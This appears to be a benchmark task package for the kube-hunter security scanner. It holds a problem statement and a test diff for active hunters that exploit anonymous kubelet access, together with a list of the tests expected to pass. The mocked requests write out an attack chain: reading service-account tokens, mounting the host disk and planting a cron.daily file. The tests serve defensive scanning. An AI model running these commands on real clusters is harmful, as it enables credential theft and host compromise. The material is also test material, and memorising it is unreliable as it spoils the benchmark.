active issue in the repository. - [x] I have added automated testing to cover this case. ## Notes This piece of work is unrelated to any active issue in the repository. It brings additional functionality.
**Title** Add active hunters for exposing and exploiting privileged containers via an insecure kubelet secure port **Problem** When the kubelet’s secure port permits anonymous requests, privileged containers become reachable from outside the cluster. An attacker can read service‑account tokens, enumerate environment variables, and potentially mount the host filesystem to start or modify host‑level processes. **Root Cause** Mis‑configuration that enables anonymous authentication on the kubelet’s HTTPS API together with the presence of privileged containers (or containers with `SYS_ADMIN` capabilities) gives unauthenticated users direct access to container runtimes. **Fix / Expected Behavior** - Introduce a hunter that validates anonymous access to the kubelet, enumerates pods, extracts tokens, and flags any privileged containers, publishing a new vulnerability event. - Introduce a second hunter that, upon detection of such containers, attempts to mount the host filesystem and create/execute a cron job to demonstrate host compromise, reporting success or failure. - Add comprehensive documentation describing the issue, remediation steps, and references. - Bump the `requests-mock` development dependency to satisfy version constraints. **Risk & Validation** - The new hunters are triggered only after the anonymous‑auth event, minimizing unnecessary traffic on healthy clusters. - Unit tests cover the new detection and exploitation logic; integration tests verify that the vulnerability is reported only when the insecure configuration exists. - Documentation builds successfully, and the updated dependency does not break existing test suites.
344
aquasecurity/kube-hunter
diff --git a/tests/core/test_handler.py b/tests/core/test_handler.py index 5c48975..5ccc71e 100644 --- a/tests/core/test_handler.py +++ b/tests/core/test_handler.py @@ -28,11 +28,13 @@ from kube_hunter.modules.hunting.dashboard import KubeDashboard from kube_hunter.modules.hunting.dns import DnsSpoofHunter from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive from kube_hunter.modules.hunting.kubelet import ( - ReadOnlyKubeletPortHunter, - SecureKubeletPortHunter, - ProveRunHandler, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, ProveContainerLogsHandler, + ProveRunHandler, ProveSystemLogs, + ReadOnlyKubeletPortHunter, + SecureKubeletPortHunter, ) from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve @@ -77,6 +79,8 @@ ACTIVE_HUNTERS = { ProveVarLogMount, ProveProxyExposed, K8sVersionDisclosureProve, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, } diff --git a/tests/hunting/test_kubelet.py b/tests/hunting/test_kubelet.py new file mode 100644 index 0000000..1b54e87 --- /dev/null +++ b/tests/hunting/test_kubelet.py @@ -0,0 +1,723 @@ +import requests +import requests_mock +import urllib.parse +import uuid + +from kube_hunter.core.events import handler +from kube_hunter.modules.hunting.kubelet import ( + AnonymousAuthEnabled, + ExposedExistingPrivilegedContainersViaSecureKubeletPort, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, +) + +counter = 0 +pod_list_with_privileged_container = """{ + "kind": "PodList", + "apiVersion": "v1", + "metadata": {}, + "items": [ + { + "metadata": { + "name": "kube-hunter-privileged-deployment-86dc79f945-sjjps", + "namespace": "kube-hunter-privileged" + }, + "spec": { + "containers": [ + { + "name": "ubuntu", + "securityContext": { + {security_context_definition_to_test} + } + } + ] + } + } + ] +} +""" +service_account_token = "eyJhbGciOiJSUzI1NiIsImtpZCI6IlR0YmxoMXh..." +env = """PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=kube-hunter-privileged-deployment-86dc79f945-sjjps +KUBERNETES_SERVICE_PORT=443 +KUBERNETES_SERVICE_PORT_HTTPS=443 +KUBERNETES_PORT=tcp://10.96.0.1:443 +KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443 +KUBERNETES_PORT_443_TCP_PROTO=tcp +KUBERNETES_PORT_443_TCP_PORT=443 +KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1 +KUBERNETES_SERVICE_HOST=10.96.0.1 +HOME=/root""" +exposed_privileged_containers = [ + { + "container_name": "ubuntu", + "environment_variables": env, + "pod_id": "kube-hunter-privileged-deployment-86dc79f945-sjjps", + "pod_namespace": "kube-hunter-privileged", + "service_account_token": service_account_token, + } +] +cat_proc_cmdline = "BOOT_IMAGE=/boot/bzImage root=LABEL=Mock loglevel=3 console=ttyS0" +number_of_rm_attempts = 1 +number_of_umount_attempts = 1 +number_of_rmdir_attempts = 1 + + +def create_test_event_type_one(): + anonymous_auth_enabled_event = AnonymousAuthEnabled() + + anonymous_auth_enabled_event.host = "localhost" + anonymous_auth_enabled_event.session = requests.Session() + + return anonymous_auth_enabled_event + + +def create_test_event_type_two(): + exposed_existing_privileged_containers_via_secure_kubelet_port_event = ExposedExistingPrivilegedContainersViaSecureKubeletPort( + exposed_privileged_containers + ) + exposed_existing_privileged_containers_via_secure_kubelet_port_event.host = "localhost" + exposed_existing_privileged_containers_via_secure_kubelet_port_event.session = requests.Session() + + return exposed_existing_privileged_containers_via_secure_kubelet_port_event + + +def test_get_request_valid_url(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/mock" + + session_mock.get(url, text="mock") + + return_value = class_being_tested.get_request(url) + + assert return_value == "mock" + + +def test_get_request_invalid_url(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/[mock]" + + session_mock.get(url, exc=requests.exceptions.InvalidURL) + + return_value = class_being_tested.get_request(url) + + assert return_value.startswith("Exception: ") + + +def post_request(url, params, expected_return_value, exception=None): + class_being_tested_one = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested_one.event.session) as session_mock: + mock_params = {"text": "mock"} if not exception else {"exc": exception} + session_mock.post(url, **mock_params) + + return_value = class_being_tested_one.post_request(url, params) + + assert return_value == expected_return_value + + class_being_tested_two = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two()) + + with requests_mock.Mocker(session=class_being_tested_two.event.session) as session_mock: + mock_params = {"text": "mock"} if not exception else {"exc": exception} + session_mock.post(url, **mock_params) + + return_value = class_being_tested_two.post_request(url, params) + + assert return_value == expected_return_value + + +def test_post_request_valid_url_with_parameters(): + url = "https://localhost:10250/mock?cmd=ls" + params = {"cmd": "ls"} + post_request(url, params, expected_return_value="mock") + + +def test_post_request_valid_url_without_parameters(): + url = "https://localhost:10250/mock" + params = {} + post_request(url, params, expected_return_value="mock") + + +def test_post_request_invalid_url_with_parameters(): + url = "https://localhost:10250/mock?cmd=ls" + params = {"cmd": "ls"} + post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL) + + +def test_post_request_invalid_url_without_parameters(): + url = "https://localhost:10250/mock" + params = {} + post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL) + + +def test_has_no_exception_result_with_exception(): + mock_result = "Exception: Mock." + + return_value = ProveAnonymousAuth.has_no_exception(mock_result) + + assert return_value is False + + +def test_has_no_exception_result_without_exception(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_exception(mock_result) + + assert return_value is True + + +def test_has_no_error_result_with_error(): + mock_result = "Mock exited with error." + + return_value = ProveAnonymousAuth.has_no_error(mock_result) + + assert return_value is False + + +def test_has_no_error_result_without_error(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_error(mock_result) + + assert return_value is True + + +def test_has_no_error_nor_exception_result_without_exception_and_without_error(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is True + + +def test_has_no_error_nor_exception_result_with_exception_and_without_error(): + mock_result = "Exception: Mock." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def test_has_no_error_nor_exception_result_without_exception_and_with_error(): + mock_result = "Mock exited with error." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def test_has_no_error_nor_exception_result_with_exception_and_with_error(): + mock_result = "Exception: Mock. Mock exited with error." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def proveanonymousauth_success(anonymous_auth_enabled_event, security_context_definition_to_test): + global counter + counter = 0 + + with requests_mock.Mocker(session=anonymous_auth_enabled_event.session) as session_mock: + url = "https://" + anonymous_auth_enabled_event.host + ":10250/" + listing_pods_url = url + "pods" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + + session_mock.get( + listing_pods_url, + text=pod_list_with_privileged_container.replace( + "{security_context_definition_to_test}", security_context_definition_to_test + ), + ) + session_mock.post( + run_url + urllib.parse.quote("cat /var/run/secrets/kubernetes.io/serviceaccount/token", safe=""), + text=service_account_token, + ) + session_mock.post(run_url + "env", text=env) + + class_being_tested = ProveAnonymousAuth(anonymous_auth_enabled_event) + class_being_tested.execute() + + assert "The following containers have been successfully breached." in class_being_tested.event.evidence + + assert counter == 1 + + +def test_proveanonymousauth_success_with_privileged_container_via_privileged_setting(): + proveanonymousauth_success(create_test_event_type_one(), '"privileged": true') + + +def test_proveanonymousauth_success_with_privileged_container_via_capabilities(): + proveanonymousauth_success(create_test_event_type_one(), '"capabilities": { "add": ["SYS_ADMIN"] }') + + +def test_proveanonymousauth_connectivity_issues(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://" + class_being_tested.event.host + ":10250/" + listing_pods_url = url + "pods" + + session_mock.get(listing_pods_url, exc=requests.exceptions.ConnectionError) + + class_being_tested.execute() + + assert class_being_tested.event.evidence == "" + + +@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort) +class ExposedPrivilegedContainersViaAnonymousAuthEnabledInSecureKubeletPortEventCounter(object): + def __init__(self, event): + global counter + counter += 1 + + +def test_check_file_exists_existing_file(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt") + + return_value = class_being_tested.check_file_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "mock.txt" + ) + + assert return_value is True + + +def test_check_file_exists_non_existent_file(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls nonexistentmock.txt", safe=""), + text="ls: nonexistentmock.txt: No such file or directory", + ) + + return_value = class_being_tested.check_file_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "nonexistentmock.txt", + ) + + assert return_value is False + + +rm_command_removed_successfully_callback_counter = 0 + + +def rm_command_removed_successfully_callback(request, context): + global rm_command_removed_successfully_callback_counter + + if rm_command_removed_successfully_callback_counter == 0: + rm_command_removed_successfully_callback_counter += 1 + return "mock.txt" + else: + return "ls: mock.txt: No such file or directory" + + +def test_rm_command_removed_successfully(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls mock.txt", safe=""), text=rm_command_removed_successfully_callback + ) + session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="") + + return_value = class_being_tested.rm_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "mock.txt", + number_of_rm_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is True + + +def test_rm_command_removed_failed(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt") + session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="Permission denied") + + return_value = class_being_tested.rm_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "mock.txt", + number_of_rm_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is False + + +def test_attack_exposed_existing_privileged_container_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text="" + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + number_of_rm_attempts, + None, + file_name, + ) + + assert return_value["result"] is True + + +def test_attack_exposed_existing_privileged_container_failure_when_touch(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), + text="Operation not permitted", + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + None, + file_name, + ) + + assert return_value["result"] is False + + +def test_attack_exposed_existing_privileged_container_failure_when_chmod(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + None, + file_name, + ) + + assert return_value["result"] is False + + +def test_check_directory_exists_existing_directory(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt") + + return_value = class_being_tested.check_directory_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock" + ) + + assert return_value is True + + +def test_check_directory_exists_non_existent_directory(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="ls: Mock: No such file or directory") + + return_value = class_being_tested.check_directory_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock" + ) + + assert return_value is False + + +rmdir_command_removed_successfully_callback_counter = 0 + + +def rmdir_command_removed_successfully_callback(request, context): + global rmdir_command_removed_successfully_callback_counter + + if rmdir_command_removed_successfully_callback_counter == 0: + rmdir_command_removed_successfully_callback_counter += 1 + return "mock.txt" + else: + return "ls: Mock: No such file or directory" + + +def test_rmdir_command_removed_successfully(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls Mock", safe=""), text=rmdir_command_removed_successfully_callback + ) + session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="") + + return_value = class_being_tested.rmdir_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "Mock", + number_of_rmdir_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is True + + +def test_rmdir_command_removed_failed(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt") + session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="Permission denied") + + return_value = class_being_tested.rmdir_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "Mock", + number_of_rmdir_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is False + + +def test_get_root_values_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + root_value, root_value_type = class_being_tested.get_root_values(cat_proc_cmdline) + + assert root_value == "Mock" and root_value_type == "LABEL=" + + +def test_get_root_values_failure(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + root_value, root_value_type = class_being_tested.get_root_values("") + + assert root_value is None and root_value_type is None + + +def test_process_exposed_existing_privileged_container_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname" + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is True + + +def test_process_exposed_existing_privileged_container_failure_when_cat_cmdline(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text="Permission denied") + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_findfs(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="Permission denied") + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_mkdir(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post( + run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="Permission denied" + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_mount(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_cat_hostname(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_maliciousintentviasecurekubeletport_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname" + ) + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text="" + ) + + class_being_tested.execute(directory_created, file_name) + + message = "The following exposed existing privileged containers have been successfully" + message += " abused by starting/modifying a process in the host." + + assert message in class_being_tested.event.evidence
[ "tests/core/test_handler.py::test_passive_hunters_registered", "tests/core/test_handler.py::test_active_hunters_registered", "tests/core/test_handler.py::test_all_hunters_registered", "tests/hunting/test_kubelet.py::test_get_request_valid_url", "tests/hunting/test_kubelet.py::test_get_request_invalid_url", "tests/hunting/test_kubelet.py::test_post_request_valid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_valid_url_without_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_without_parameters", "tests/hunting/test_kubelet.py::test_has_no_exception_result_with_exception", "tests/hunting/test_kubelet.py::test_has_no_exception_result_without_exception", "tests/hunting/test_kubelet.py::test_has_no_error_result_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_result_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_with_error", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_privileged_setting", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_capabilities", "tests/hunting/test_kubelet.py::test_proveanonymousauth_connectivity_issues", "tests/hunting/test_kubelet.py::test_check_file_exists_existing_file", "tests/hunting/test_kubelet.py::test_check_file_exists_non_existent_file", "tests/hunting/test_kubelet.py::test_rm_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rm_command_removed_failed", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_touch", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_chmod", "tests/hunting/test_kubelet.py::test_check_directory_exists_existing_directory", "tests/hunting/test_kubelet.py::test_check_directory_exists_non_existent_directory", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_failed", "tests/hunting/test_kubelet.py::test_get_root_values_success", "tests/hunting/test_kubelet.py::test_get_root_values_failure", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_cmdline", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_findfs", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mkdir", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mount", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_hostname", "tests/hunting/test_kubelet.py::test_maliciousintentviasecurekubeletport_success" ]
[]
